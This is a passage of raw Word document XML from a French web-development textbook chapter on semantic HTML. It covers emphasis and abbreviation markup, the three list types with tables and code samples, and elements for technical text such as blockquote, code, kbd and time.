      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un lecteur d'écran peut annoncer une emphase : « important : ... » ou « insiste : ... ». Cette information disparaît si vous utilisez une classe CSS pour obtenir du gras. Le sens doit être porté par le HTML, l'apparence par le CSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Emphase, exposant et abréviation dans un texte courant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&lt;p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Le mot de passe doit contenir &lt;strong&gt;au moins douze caractères&lt;/strong&gt;.</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Cette règle &lt;em&gt;n'est pas une recommandation&lt;/em&gt; : elle est obligatoire.</w:t>
        <w:br/>
        <w:t>&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;p&gt;</w:t>
        <w:br/>
        <w:t>La formule E = mc&lt;sup&gt;2&lt;/sup&gt; utilise l'&lt;abbr title="exposant"&gt;exp.&lt;/abbr&gt; 2.</w:t>
        <w:br/>
        <w:t xml:space="preserve">  L'eau bout à 100 °C à pression atmosphérique.</w:t>
        <w:br/>
        <w:t>&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 Listes : trois structures distinctes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois types de listes répondent à trois besoins. Les confondre est une erreur fréquente : une liste de définitions rendue avec des puces perd son sens, et une liste ordonnée sans numéros cache une séquence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.13 — Choisir le bon type de liste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114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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="327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Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="458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Exemple d'usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1147"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ul</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Collection sans ordre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4589"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Menus, avantages, ingrédients</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1147"/>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ol</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Séquence ordonnée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="458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Étapes, classement, instructions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1147"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dl</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Termes et définitions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4589"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Glossaire, spécifications, FAQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Les trois listes, chacune avec sa sémantique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&lt;ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;li&gt;HTML&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;li&gt;CSS&lt;/li&gt;</w:t>
        <w:br/>
        <w:t>&lt;/ul&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;ol&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;li&gt;Ouvrir le terminal.&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;li&gt;Lancer le serveur local.&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;li&gt;Ouvrir la page dans le navigateur.&lt;/li&gt;</w:t>
        <w:br/>
        <w:t>&lt;/ol&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;dl&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;dt&gt;DOM&lt;/dt&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;dd&gt;Représentation arborescente du document.&lt;/dd&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;dt&gt;CSSOM&lt;/dt&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;dd&gt;Représentation des styles calculés.&lt;/dd&gt;</w:t>
        <w:br/>
        <w:t>&lt;/dl&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les listes s'imbriquent : une </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> peut contenir une </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>li</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. En revanche, aucun autre élément ne doit être placé directement entre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>li</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : le validateur le signale, et les lecteurs d'écran annoncent alors un nombre d'éléments erroné.</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LA NAVIGATION EST UNE LISTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un menu est une liste de liens. Utilisez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>nav &gt; ul &gt; li &gt; a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> plutôt qu'une suite d'ancres séparées par des barres verticales. Les technologies d'assistance annoncent alors « liste de 6 éléments », ce qui aide à se repérer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.5 Citations, code et données techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un texte professionnel cite ses sources, nomme ses fichiers et distingue le code du commentaire. HTML fournit des éléments dédiés, souvent ignorés au profit de simples italiques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.14 — Dix éléments pour un texte technique précis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158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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="411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Note</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1581"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>blockquote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Citation longue, en bloc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4112"/>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Attribut </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour l'URL source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="158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q</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Citation courte, en ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="411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Les guillemets sont ajoutés par le navigateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1581"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Titre d'une œuvre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4112"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pas le nom de l'auteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="158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code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Fragment de code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="411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À combiner avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pre</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour un bloc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1581"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Texte préformaté</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4112"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conserve espaces et retours à la ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="158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kbd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Touche ou saisie clavier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="411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Ctrl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1581"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>samp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sortie d'un programme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4112"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Message d'erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="158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var</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Variable mathématique ou de code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="411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x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>userId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1581"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3321"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Date ou durée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4112"/>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Attribut </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>datetime</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> normalisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
